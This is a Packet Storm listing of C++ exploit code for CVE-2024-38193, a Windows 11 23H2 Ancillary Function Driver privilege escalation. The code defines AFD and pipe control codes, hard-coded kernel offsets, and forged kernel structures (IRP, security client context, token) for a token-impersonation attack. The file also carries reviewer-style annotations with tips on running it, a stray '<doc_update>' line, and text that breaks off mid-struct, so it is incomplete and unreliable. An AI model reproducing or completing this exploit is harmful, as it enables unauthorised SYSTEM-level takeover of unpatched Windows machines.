📄 Microsoft Windows 11 Pro 23H2 Privilege Escalation

🗓️ 09 May 2025 00:00:00 · Reported by Milad Karimi · Type: packetstorm · Source: packetstorm.news

Windows 11 Pro 23H2 privilege escalation via Ancillary Function Driver for socket operations (CVE-2024-38193).

Code
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Elevation of Privilege
    # Date: 2025-05-05
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: [email protected]
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Tested on: Win x64
    # CVE : CVE-2024-38193
    
    #pragma once
    
    #include "ntstatus.h"
    #include "Windows.h"
    #include <iostream>
    
    #pragma comment(lib, "ntdll.lib")
    
    
    // Split a 64-bit value into its high / low 32-bit halves.
    #define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
    #define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

    // Extended-attribute name handed to NtCreateFile on \Device\Afd to open a
    // socket endpoint (15 characters, see EaName[15] in AFD_CREATE_PACKET below).
    #define AfdOpenPacket "AfdOpenPacketXX"
    #define AFD_DEVICE_NAME L"\\Device\\Afd"
    #define LOCALHOST "127.0.0.1"


    // AFD and named-pipe control codes used by the exploit. Only the names are
    // visible here; no header in this file cross-checks the values.
    // NOTE(review): FSCTL_PIPE_INTERNAL_WRITE is the only one without the LL
    // suffix (int rather than long long) - harmless for a ULONG parameter, but
    // inconsistent with the rest.
    #define IOCTL_AFD_BIND 0x12003LL
    #define IOCTL_AFD_LISTEN 0x1200BLL
    #define IOCTL_AFD_CONNECT 0x120BBLL
    #define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
    #define FSCTL_PIPE_PEEK 0x11400CLL
    #define FSCTL_PIPE_IMPERSONATE 0x11001CLL
    #define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

    // Object-manager attributes / NtCreateFile disposition used when opening
    // the AFD device and the pipes, and the usual NTSTATUS success test.
    #define OBJ_CASE_INSENSITIVE 0x00000040
    #define OBJ_INHERIT 0x00000002
    #define FILE_OPEN_IF 0x3
    #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

    // Hard-coded kernel structure offsets for the build the author tested
    // ("Win x64", Windows 11 23H2 per the title). The OFFSET_IN_TOKEN_* values
    // agree with the _TOKEN layout further down in this file (Privileges 0x40,
    // PrimaryGroup 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8, VariablePart 0x490).
    // PREVIOUS_MODE_OFFSET, OFFSET_TO_ACTIVE_PROCESS_LINKS and OFFSET_TO_TOKEN
    // presumably index KTHREAD.PreviousMode and EPROCESS.ActiveProcessLinks /
    // EPROCESS.Token, but no struct in this file backs them. Every one of these
    // is build-specific: verify against symbols for the exact target build
    // before running, because a wrong offset corrupts kernel memory and crashes
    // the machine rather than elevating.
    #define OFFSET_IN_TOKEN_VARIABLEPART 0x490
    #define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
    #define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
    #define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
    #define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
    #define PREVIOUS_MODE_OFFSET 0x232
    #define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
    #define OFFSET_TO_TOKEN 0x4b8
    // (HANDLE)-2, the value GetCurrentThread() hands back as the pseudo-handle
    // for the calling thread.
    #define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
    
    
    // User-mode mirror of the native IO_STATUS_BLOCK (0x10 bytes on x64; the
    // _IRP below embeds it at 0x30 and the next member sits at 0x40).
    // NOTE(review): the typedef declares no alias, so only the tag
    // `struct IO_STATUS_BLOCK` is usable, and Information is typed as DWORD*
    // although the documented member is a ULONG_PTR byte count / result value.
    // Size and offset are unaffected on x64, but treat the field as an integer,
    // never as something to dereference.
    typedef struct IO_STATUS_BLOCK
    {
        union
        {
            DWORD Status;   // NTSTATUS of the completed request
            PVOID Pointer;
        };

        DWORD* Information; // byte count / result value (see note above)
    };
    
    //0x4 bytes (sizeof)
    // Bit-packed power-transition context; the nine bit-fields total 32 bits
    // and alias ContextAsUlong. Only referenced from
    // _IO_STACK_LOCATION.Parameters.Power below.
    struct _SYSTEM_POWER_STATE_CONTEXT
    {
        union
        {
            struct
            {
                ULONG Reserved1 : 8; //0x0
                ULONG TargetSystemState : 4; //0x0
                ULONG EffectiveSystemState : 4; //0x0
                ULONG CurrentSystemState : 4; //0x0
                ULONG IgnoreHibernationPath : 1; //0x0
                ULONG PseudoTransition : 1; //0x0
                ULONG KernelSoftReboot : 1; //0x0
                ULONG DirectedDripsTransition : 1; //0x0
                ULONG Reserved2 : 8; //0x0
            };
            ULONG ContextAsUlong; //0x0
        };
    };
    
    //0x4 bytes (sizeof)
    // Either a system or a device power state, as used by
    // _IO_STACK_LOCATION.Parameters.Power.State below. Both enum types come
    // from the Windows headers included at the top of the file.
    union _POWER_STATE
    {
        enum _SYSTEM_POWER_STATE SystemState; //0x0
        enum _DEVICE_POWER_STATE DeviceState; //0x0
    };
    
    //0x48 bytes (sizeof)
    // User-mode mirror of the kernel IO_STACK_LOCATION, reproduced in full so a
    // crafted stack location can be built with the right member offsets
    // (mm.crafted_arbitrary_io_stack_location below points at one). The
    // per-major-function Parameters union members all start at 0x8; which of
    // them the exploit actually fills in is not visible in this excerpt.
    // Offsets are for the x64 build the author targeted.
    typedef struct _IO_STACK_LOCATION
    {
        UCHAR MajorFunction; //0x0
        UCHAR MinorFunction; //0x1
        UCHAR Flags; //0x2
        UCHAR Control; //0x3
        union
        {
            struct
            {
                struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
                ULONG Options; //0x10
                USHORT FileAttributes; //0x18
                USHORT ShareAccess; //0x1a
                ULONG EaLength; //0x20
            } Create; //0x8
            struct
            {
                struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
                ULONG Options; //0x10
                USHORT Reserved; //0x18
                USHORT ShareAccess; //0x1a
                struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
            } CreatePipe; //0x8
            struct
            {
                struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
                ULONG Options; //0x10
                USHORT Reserved; //0x18
                USHORT ShareAccess; //0x1a
                struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
            } CreateMailslot; //0x8
            struct
            {
                ULONG Length; //0x8
                ULONG Key; //0x10
                ULONG Flags; //0x14
                union _LARGE_INTEGER ByteOffset; //0x18
            } Read; //0x8
            struct
            {
                ULONG Length; //0x8
                ULONG Key; //0x10
                ULONG Flags; //0x14
                union _LARGE_INTEGER ByteOffset; //0x18
            } Write; //0x8
            struct
            {
                ULONG Length; //0x8
                struct _UNICODE_STRING* FileName; //0x10
                enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
                ULONG FileIndex; //0x20
            } QueryDirectory; //0x8
            struct
            {
                ULONG Length; //0x8
                ULONG CompletionFilter; //0x10
            } NotifyDirectory; //0x8
            struct
            {
                ULONG Length; //0x8
                ULONG CompletionFilter; //0x10
                enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
    DirectoryNotifyInformationClass; //0x18
            } NotifyDirectoryEx; //0x8
            struct
            {
                ULONG Length; //0x8
                enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            } QueryFile; //0x8
            struct
            {
                ULONG Length; //0x8
                enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
                struct _FILE_OBJECT* FileObject; //0x18
                union
                {
                    struct
                    {
                        UCHAR ReplaceIfExists; //0x20
                        UCHAR AdvanceOnly; //0x21
                    };
                    ULONG ClusterCount; //0x20
                    VOID* DeleteHandle; //0x20
                };
            } SetFile; //0x8
            struct
            {
                ULONG Length; //0x8
                VOID* EaList; //0x10
                ULONG EaListLength; //0x18
                ULONG EaIndex; //0x20
            } QueryEa; //0x8
            struct
            {
                ULONG Length; //0x8
            } SetEa; //0x8
            struct
            {
                ULONG Length; //0x8
                enum _FSINFOCLASS FsInformationClass; //0x10
            } QueryVolume; //0x8
            struct
            {
                ULONG Length; //0x8
                enum _FSINFOCLASS FsInformationClass; //0x10
            } SetVolume; //0x8
            // Parameters for IRP_MJ_FILE_SYSTEM_CONTROL (the FSCTL_PIPE_* codes
            // defined at the top of the file travel in FsControlCode).
            struct
            {
                ULONG OutputBufferLength; //0x8
                ULONG InputBufferLength; //0x10
                ULONG FsControlCode; //0x18
                VOID* Type3InputBuffer; //0x20
            } FileSystemControl; //0x8
            struct
            {
                union _LARGE_INTEGER* Length; //0x8
                ULONG Key; //0x10
                union _LARGE_INTEGER ByteOffset; //0x18
            } LockControl; //0x8
            // Parameters for IRP_MJ_DEVICE_CONTROL (the IOCTL_AFD_* codes travel
            // in IoControlCode).
            struct
            {
                ULONG OutputBufferLength; //0x8
                ULONG InputBufferLength; //0x10
                ULONG IoControlCode; //0x18
                VOID* Type3InputBuffer; //0x20
            } DeviceIoControl; //0x8
            struct
            {
                ULONG SecurityInformation; //0x8
                ULONG Length; //0x10
            } QuerySecurity; //0x8
            struct
            {
                ULONG SecurityInformation; //0x8
                VOID* SecurityDescriptor; //0x10
            } SetSecurity; //0x8
            struct
            {
                struct _VPB* Vpb; //0x8
                struct _DEVICE_OBJECT* DeviceObject; //0x10
            } MountVolume; //0x8
            struct
            {
                struct _VPB* Vpb; //0x8
                struct _DEVICE_OBJECT* DeviceObject; //0x10
            } VerifyVolume; //0x8
            struct
            {
                struct _SCSI_REQUEST_BLOCK* Srb; //0x8
            } Scsi; //0x8
            struct
            {
                ULONG Length; //0x8
                VOID* StartSid; //0x10
                struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
                ULONG SidListLength; //0x20
            } QueryQuota; //0x8
            struct
            {
                ULONG Length; //0x8
            } SetQuota; //0x8
            struct
            {
                enum _DEVICE_RELATION_TYPE Type; //0x8
            } QueryDeviceRelations; //0x8
            struct
            {
                struct _GUID* InterfaceType; //0x8
                USHORT Size; //0x10
                USHORT Version; //0x12
                struct _INTERFACE* Interface; //0x18
                VOID* InterfaceSpecificData; //0x20
            } QueryInterface; //0x8
            struct
            {
                struct _DEVICE_CAPABILITIES* Capabilities; //0x8
            } DeviceCapabilities; //0x8
            struct
            {
                struct _IO_RESOURCE_REQUIREMENTS_LIST*
    IoResourceRequirementList; //0x8
            } FilterResourceRequirements; //0x8
            struct
            {
                ULONG WhichSpace; //0x8
                VOID* Buffer; //0x10
                ULONG Offset; //0x18
                ULONG Length; //0x20
            } ReadWriteConfig; //0x8
            struct
            {
                UCHAR Lock; //0x8
            } SetLock; //0x8
            struct
            {
                enum BUS_QUERY_ID_TYPE IdType; //0x8
            } QueryId; //0x8
            struct
            {
                enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
                ULONG LocaleId; //0x10
            } QueryDeviceText; //0x8
            struct
            {
                UCHAR InPath; //0x8
                UCHAR Reserved[3]; //0x9
                enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
            } UsageNotification; //0x8
            struct
            {
                enum _SYSTEM_POWER_STATE PowerState; //0x8
            } WaitWake; //0x8
            struct
            {
                struct _POWER_SEQUENCE* PowerSequence; //0x8
            } PowerSequence; //0x8
            struct
            {
                union
                {
                    ULONG SystemContext; //0x8
                    struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
    //0x8
                };
                enum _POWER_STATE_TYPE Type; //0x10
                union _POWER_STATE State; //0x18
                enum POWER_ACTION ShutdownType; //0x20
            } Power; //0x8
            struct
            {
                struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
                struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
            } StartDevice; //0x8
            struct
            {
                ULONGLONG ProviderId; //0x8
                VOID* DataPath; //0x10
                ULONG BufferSize; //0x18
                VOID* Buffer; //0x20
            } WMI; //0x8
            struct
            {
                VOID* Argument1; //0x8
                VOID* Argument2; //0x10
                VOID* Argument3; //0x18
                VOID* Argument4; //0x20
            } Others; //0x8
        } Parameters; //0x8
        struct _DEVICE_OBJECT* DeviceObject; //0x28
        struct _FILE_OBJECT* FileObject; //0x30
        // Kernel-mode function pointer; in a crafted stack location this is a
        // value the kernel would call, so it must point at real kernel code.
        LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
    arg2, VOID* arg3); //0x38
        VOID* Context; //0x40
    }IO_STACK_LOCATION;
    
    //0x18 bytes (sizeof)
    // Device-queue link record; only present here because it is one of the
    // overlays of _IRP.Tail.Overlay.DriverContext below.
    struct _KDEVICE_QUEUE_ENTRY
    {
        struct _LIST_ENTRY DeviceListEntry; //0x0
        ULONG SortKey; //0x10
        UCHAR Inserted; //0x14
    };
    
    //0x58 bytes (sizeof)
    // Kernel APC object, overlaid on _IRP.Tail below (the I/O manager reuses
    // the tail of a completed IRP for its completion APC). Kept so the tail
    // of a crafted IRP has the right size.
    struct _KAPC
    {
        UCHAR Type; //0x0
        UCHAR AllFlags; //0x1
        UCHAR Size; //0x2
        UCHAR SpareByte1; //0x3
        ULONG SpareLong0; //0x4
        struct _KTHREAD* Thread; //0x8
        struct _LIST_ENTRY ApcListEntry; //0x10
        VOID* Reserved[3]; //0x20
        VOID* NormalContext; //0x38
        VOID* SystemArgument1; //0x40
        VOID* SystemArgument2; //0x48
        CHAR ApcStateIndex; //0x50
        CHAR ApcMode; //0x51
        UCHAR Inserted; //0x52
    };
<doc_update>
    //0xd0 bytes (sizeof)
    // User-mode mirror of the kernel IRP, used to build the fake IRP that
    // mm.crafted_irp points at. Offsets are for the targeted x64 build.
    // NOTE(review): IoStatus uses the local tag `IO_STATUS_BLOCK` (defined
    // above) while UserIosb names a different tag `_IO_STATUS_BLOCK` that is
    // never defined in this file; it compiles because it is only ever a
    // pointer, but the two are presumably meant to be the same type.
    struct _IRP
    {
        SHORT Type; //0x0
        USHORT Size; //0x2
        USHORT AllocationProcessorNumber; //0x4
        USHORT Reserved; //0x6
        struct _MDL* MdlAddress; //0x8
        ULONG Flags; //0x10
        union
        {
            struct _IRP* MasterIrp; //0x18
            LONG IrpCount; //0x18
            VOID* SystemBuffer; //0x18
        } AssociatedIrp; //0x18
        struct _LIST_ENTRY ThreadListEntry; //0x20
        struct IO_STATUS_BLOCK IoStatus; //0x30
        // Requestor mode of the original caller (KernelMode == 0); checks on
        // this byte decide whether buffers are probed as user memory.
        CHAR RequestorMode; //0x40
        UCHAR PendingReturned; //0x41
        CHAR StackCount; //0x42
        CHAR CurrentLocation; //0x43
        UCHAR Cancel; //0x44
        UCHAR CancelIrql; //0x45
        CHAR ApcEnvironment; //0x46
        UCHAR AllocationFlags; //0x47
        union
        {
            struct _IO_STATUS_BLOCK* UserIosb; //0x48
            VOID* IoRingContext; //0x48
        };
        struct _KEVENT* UserEvent; //0x50
        union
        {
            struct
            {
                union
                {
                    VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
    arg2, ULONG arg3); //0x58
                    VOID* IssuingProcess; //0x58
                };
                union
                {
                    VOID* UserApcContext; //0x60
                    struct _IORING_OBJECT* IoRing; //0x60
                };
            } AsynchronousParameters; //0x58
            union _LARGE_INTEGER AllocationSize; //0x58
        } Overlay; //0x58
        VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
    //0x68
        VOID* UserBuffer; //0x70
        union
        {
            struct
            {
                union
                {
                    struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                    VOID* DriverContext[4]; //0x78
                };
                struct _ETHREAD* Thread; //0x98
                CHAR* AuxiliaryBuffer; //0xa0
                struct _LIST_ENTRY ListEntry; //0xa8
                union
                {
                    // Points at the active _IO_STACK_LOCATION for this IRP;
                    // for a crafted IRP this is where the crafted stack
                    // location from struct mm would be wired in.
                    struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                    ULONG PacketType; //0xb8
                };
                struct _FILE_OBJECT* OriginalFileObject; //0xc0
                VOID* IrpExtension; //0xc8
            } Overlay; //0x78
            struct _KAPC Apc; //0x78
            VOID* CompletionKey; //0x78
        } Tail; //0x78
    };
    // TDI-style transport address header; Address[1] is a Windows-style
    // trailing variable-length array (the real address follows in memory).
    typedef struct _TA_ADDRESS
    {
        USHORT AddressLength;
        USHORT AddressType;
        UCHAR Address[1];
    }TA_ADDRESS;
    
    // TDI transport address list: a count followed by TAAddressCount
    // TA_ADDRESS records laid out back to back (Address[1] is only the first).
    typedef struct _TRANSPORT_ADDRESS
    {
        LONG TAAddressCount;
        TA_ADDRESS Address[1];
    }TRANSPORT_ADDRESS;
    
    // Native counted string (Windows.h alone does not provide it). As in the
    // native definition, Length and MaximumLength are byte counts, not
    // character counts - keep that in mind when filling ObjectName below.
    // NOTE(review): this clashes with winternl.h if that header is ever added.
    typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    } UNICODE_STRING, * PUNICODE_STRING;
    
    // Native OBJECT_ATTRIBUTES for NtCreateFile / NtOpenFile on the AFD device
    // and the pipes; Attributes takes the OBJ_* flags defined at the top.
    typedef struct _OBJECT_ATTRIBUTES
    {
        ULONG Length;
        HANDLE RootDirectory;
        PUNICODE_STRING ObjectName;
        ULONG Attributes;
        PVOID SecurityDescriptor;
        PVOID SecurityQualityOfService;
    }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
    
    // One record of NtQuerySystemInformation(SystemModuleInformation); the
    // usual source of the kernel image base (ImageBase) for offset arithmetic.
    // Availability of this class to a low-privilege caller is policy-dependent
    // (unprivileged callers may get it denied on recent builds) - not verified here.
    typedef struct _SYSTEM_MODULE_ENTRY
    {
        HANDLE Section;
        PVOID MappedBase;
        PVOID ImageBase;
        ULONG ImageSize;
        ULONG Flags;
        USHORT LoadOrderIndex;
        USHORT InitOrderIndex;
        USHORT LoadCount;
        USHORT OffsetToFileName;
        UCHAR FullPathName[256];
    } SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
    
    // Result buffer for SystemModuleInformation: Count entries follow
    // (Module[1] is only the first; callers size the buffer dynamically).
    typedef struct _SYSTEM_MODULE_INFORMATION
    {
        ULONG Count;
        SYSTEM_MODULE_ENTRY Module[1];
    } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
    
    // One record of NtQuerySystemInformation(SystemExtendedHandleInformation).
    // Object is the kernel address of the object behind a handle - this is how
    // the exploit presumably learns the address of its own token / pipe objects
    // (the lookup code itself is outside this excerpt).
    typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
    {
        PVOID Object;
        ULONG_PTR UniqueProcessId;
        ULONG_PTR HandleValue;
        ULONG GrantedAccess;
        USHORT CreatorBackTraceIndex;
        USHORT ObjectTypeIndex;
        ULONG HandleAttributes;
        ULONG Reserved;
    } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
    
    // Result buffer for SystemExtendedHandleInformation: NumberOfHandles
    // records follow (Handles[1] is only the first).
    typedef struct _SYSTEM_HANDLE_INFORMATION_EX
    {
        ULONG_PTR NumberOfHandles;
        ULONG_PTR Reserved;
        SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
    } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
    
    // EA buffer passed to NtCreateFile on \Device\Afd: a FILE_FULL_EA_INFORMATION
    // header whose EA name is AfdOpenPacket, immediately followed by the AFD
    // socket-creation parameters as the EA value.
    // NOTE(review): FILE_FULL_EA_INFORMATION declares Flags as a single UCHAR;
    // with WORD here the following members (and therefore the EA value AFD
    // reads) shift by padding. EaName[15] also holds "AfdOpenPacketXX" with no
    // terminator. Confirm against how the packet is filled before NtCreateFile
    // (not visible in this excerpt) - if AFD rejects the EA, everything
    // downstream fails before the bug is even reached.
    typedef struct _AFD_CREATE_PACKET {
        //FILE_FULL_EA_INFORMATION
        ULONG NextEntryOffset;
        WORD Flags;
        UCHAR EaNameLength;
        USHORT EaValueLength;
        CHAR EaName[15];

        //AFD_CREATE_PACKET
        ULONG EndpointFlags;
        ULONG GroupID;
        ULONG AddressFamily;
        ULONG SocketType;
        ULONG Protocol;
        ULONG SizeOfTransportName;
        wchar_t TransportName[16];
        //UCHAR Unkown;
    } AFD_CREATE_PACKET;
    
    // Only the one THREADINFOCLASS value the exploit needs (for
    // NtSetInformationThread, presumably to plant an impersonation token).
    enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
    
    // Subset of SYSTEM_INFORMATION_CLASS used with NtQuerySystemInformation
    // (module list for the kernel base, extended handle list for object
    // addresses). NOTE(review): clashes with winternl.h if it is ever included.
    enum SYSTEM_INFORMATION_CLASS {
        SystemModuleInformation = 11,
        SystemExtendedHandleInformation = 64
    };
    
    // Native event kinds for NtCreateEvent; the typedef declares no alias, so
    // only `enum EVENT_TYPE` is usable.
    typedef enum EVENT_TYPE {
        NotificationEvent,
        SynchronizationEvent
    };
    
    // Input buffer for IOCTL_AFD_BIND: share mode plus the IPv4 address to bind
    // (LOCALHOST at the top of the file is the only address defined here).
    typedef struct _AFD_BIND_DATA {
        ULONG ShareType;
        SOCKADDR_IN addr;
    } AFD_BIND_DATA, * PAFD_BIND_DATA;
    
    // Input buffer for IOCTL_AFD_CONNECT as this exploit lays it out (16-byte
    // aligned; C++11 alignas, so this file must be built as C++). The typedef
    // declares no alias. Member meanings are taken from their names only -
    // the native AFD_CONNECT_INFO layout is not reproduced in this file.
    typedef struct alignas(16) MY_AFD_CONNECT_INFO
    {
        __int64 UseSan;
        __int64 hNtSock1;
        __int64 Unknown;
        __int32 tmp6;
        WORD const_16;
        sockaddr_in bind;
    };
    
    
    // User-mode image of a named-pipe data-queue entry that the exploit feeds
    // to the kernel (mm.fake_data_entry). security_client_context is where the
    // forged _SECURITY_CLIENT_CONTEXT pointer goes.
    // NOTE(review): DATA is 0x77FD0 bytes (~480 KiB), so an instance of this
    // struct must live on the heap (or be static); a stack instance would blow
    // through the default 1 MiB thread stack when combined with other locals.
    typedef struct FAKE_DATA_ENTRY_QUEUE
    {
        DWORD tmp;
        LIST_ENTRY nextQueue;
        __int64 unknown;
        PVOID security_client_context;
        __int64 unknown2;
        __int64 sizeOfData;
        char DATA[0x77FD0];
    };
    
    // Input buffer for IOCTL_AFD_LISTEN; only the backlog size is named.
    typedef struct _AFD_LISTEN_INFO {

        ULONG unknown;
        __int64 MaximumConnectionQueue;
    } AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
    
    
    
    
    
    
    // Kernel SECURITY_CLIENT_CONTEXT as the exploit forges it. ClientToken is a
    // raw kernel pointer to a _TOKEN; pointing it at the fake token built from
    // _OBJECT_HEADER/_TOKEN below is what the FSCTL_PIPE_IMPERSONATE step
    // presumably relies on (the impersonation code is outside this excerpt).
    typedef struct _SECURITY_CLIENT_CONTEXT
    {
        _SECURITY_QUALITY_OF_SERVICE SecurityQos;
        void* ClientToken;
        unsigned __int8 DirectlyAccessClientToken;
        unsigned __int8 DirectAccessEffectiveOnly;
        unsigned __int8 ServerIsRemote;
        _TOKEN_CONTROL ClientTokenControl;
    }SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
    
    // ERESOURCE owner record (0x10 bytes with the 8-byte alignment); the
    // unnamed DWORD stands in for the OwnerCount/TableSize union.
    struct __declspec(align(8)) _OWNER_ENTRY
    {
        unsigned __int64 OwnerThread;
        DWORD ___u1;
    };
    
    
    //0x68 bytes (sizeof)
    // Kernel ERESOURCE; a fake _TOKEN needs a plausible TokenLock pointer, and
    // mm.TokenLock below holds the one the exploit uses.
    typedef struct _ERESOURCE
    {
        struct _LIST_ENTRY SystemResourcesList; //0x0
        struct _OWNER_ENTRY* OwnerTable; //0x10
        SHORT ActiveCount; //0x18
        union
        {
            USHORT Flag; //0x1a
            struct
            {
                UCHAR ReservedLowFlags; //0x1a
                UCHAR WaiterPriority; //0x1b
            };
        };
        VOID* SharedWaiters; //0x20
        VOID* ExclusiveWaiters; //0x28
        struct _OWNER_ENTRY OwnerEntry; //0x30
        ULONG ActiveEntries; //0x40
        ULONG ContentionCount; //0x44
        ULONG NumberOfSharedWaiters; //0x48
        ULONG NumberOfExclusiveWaiters; //0x4c
        VOID* Reserved2; //0x50
        union
        {
            VOID* Address; //0x58
            ULONGLONG CreatorBackTraceIndex; //0x58
        };
        ULONGLONG SpinLock; //0x60
    }ERESOURCE, *PERESOURCE;
    
    //0x8 bytes (sizeof)
    // Kernel push lock (one pointer-sized word). The typedef declares no alias,
    // so it is referenced as `struct _EX_PUSH_LOCK` below.
    typedef struct _EX_PUSH_LOCK
    {
        union
        {
            struct
            {
                ULONGLONG Locked : 1; //0x0
                ULONGLONG Waiting : 1; //0x0
                ULONGLONG Waking : 1; //0x0
                ULONGLONG MultipleShared : 1; //0x0
                ULONGLONG Shared : 60; //0x0
            };
            ULONGLONG Value; //0x0
            VOID* Ptr; //0x0
        };
    };
    
    //0x10 bytes (sizeof)
    // Lock + hash table pair embedded in _SEP_LOGON_SESSION_REFERENCES below.
    typedef struct _SEP_CACHED_HANDLES_TABLE
    {
        struct _EX_PUSH_LOCK Lock; //0x0
        struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
    };
    
    //0x8 bytes (sizeof)
    // Rundown reference word, embedded in _OB_HANDLE_REVOCATION_BLOCK below.
    typedef struct _EX_RUNDOWN_REF
    {
        union
        {
            ULONGLONG Count; //0x0
            VOID* Ptr; //0x0
        };
    };
    
    //0x20 bytes (sizeof)
    // Handle-revocation bookkeeping embedded in _SEP_LOGON_SESSION_REFERENCES
    // at 0x80; present only to keep that struct's size right.
    typedef struct _OB_HANDLE_REVOCATION_BLOCK
    {
        struct _LIST_ENTRY RevocationInfos; //0x0
        struct _EX_PUSH_LOCK Lock; //0x10
        struct _EX_RUNDOWN_REF Rundown; //0x18
    };
    
    //0xc0 bytes (sizeof)
    // Kernel logon-session record that _TOKEN.LogonSession points at;
    // mm.LogonSession below carries the one used for the fake token. The
    // typedef declares no alias (struct mm uses the tag directly, which C++
    // permits).
    typedef struct _SEP_LOGON_SESSION_REFERENCES
    {
        struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
        struct _LUID LogonId; //0x8
        struct _LUID BuddyLogonId; //0x10
        LONGLONG ReferenceCount; //0x18
        ULONG Flags; //0x20
        struct _DEVICE_MAP* pDeviceMap; //0x28
        VOID* Token; //0x30
        struct _UNICODE_STRING AccountName; //0x38
        struct _UNICODE_STRING AuthorityName; //0x48
        struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
        struct _EX_PUSH_LOCK SharedDataLock; //0x68
        struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
    //0x70
        struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
        struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
        struct _EJOB* ServerSilo; //0xa0
        struct _LUID SiblingAuthId; //0xa8
        struct _LIST_ENTRY TokenList; //0xb0
    };
    //0x30 bytes (sizeof)
    // Security-attribute list block that _TOKEN.pSecurityAttributes points at
    // (mm.pSecurityAttributes below holds the exploit's copy).
    typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
    {
        ULONG SecurityAttributeCount; //0x0
        struct _LIST_ENTRY SecurityAttributesList; //0x8
        ULONG WorkingSecurityAttributeCount; //0x18
        struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
    }AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
    
    //0x20 bytes (sizeof)
    // Reference-counted SID value block referenced from _TOKEN.TokenSidValues
    // and _SEP_LOGON_SESSION_REFERENCES.SharedSidValues.
    typedef struct _SEP_SID_VALUES_BLOCK
    {
        ULONG BlockLength; //0x0
        LONGLONG ReferenceCount; //0x8
        ULONG SidCount; //0x10
        ULONGLONG SidValuesStart; //0x18
    }SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
    
    //0x18 bytes (sizeof)
    // Privilege bitmasks at _TOKEN+0x40 (OFFSET_IN_TOKEN_TOKEN_PRIVILEGES).
    // Setting bits in Present/Enabled is the classic token-privilege
    // escalation; the three words are what a kernel write primitive would target.
    struct _SEP_TOKEN_PRIVILEGES
    {
        ULONGLONG Present; //0x0
        ULONGLONG Enabled; //0x8
        ULONGLONG EnabledByDefault; //0x10
    };
    
    //0x1f bytes (sizeof)
    // Per-token audit policy at _TOKEN+0x58; kept only for layout.
    struct _SEP_AUDIT_POLICY
    {
        struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
        UCHAR PolicySetStatus; //0x1e
    };
    
    //0x498 bytes (sizeof)
    // Kernel _TOKEN layout for the targeted build; mm.fakeToken below points
    // at a user-controlled instance. The OFFSET_IN_TOKEN_* macros at the top
    // of the file are derived from this layout: Privileges 0x40, PrimaryGroup
    // 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8, VariablePart 0x490. If any of
    // these members moves on another build the macros must move with it.
    struct _TOKEN
    {
        struct _TOKEN_SOURCE TokenSource; //0x0
        struct _LUID TokenId; //0x10
        struct _LUID AuthenticationId; //0x18
        struct _LUID ParentTokenId; //0x20
        union _LARGE_INTEGER ExpirationTime; //0x28
        struct _ERESOURCE* TokenLock; //0x30
        struct _LUID ModifiedId; //0x38
        struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40  == OFFSET_IN_TOKEN_TOKEN_PRIVILEGES
        struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
        ULONG SessionId; //0x78
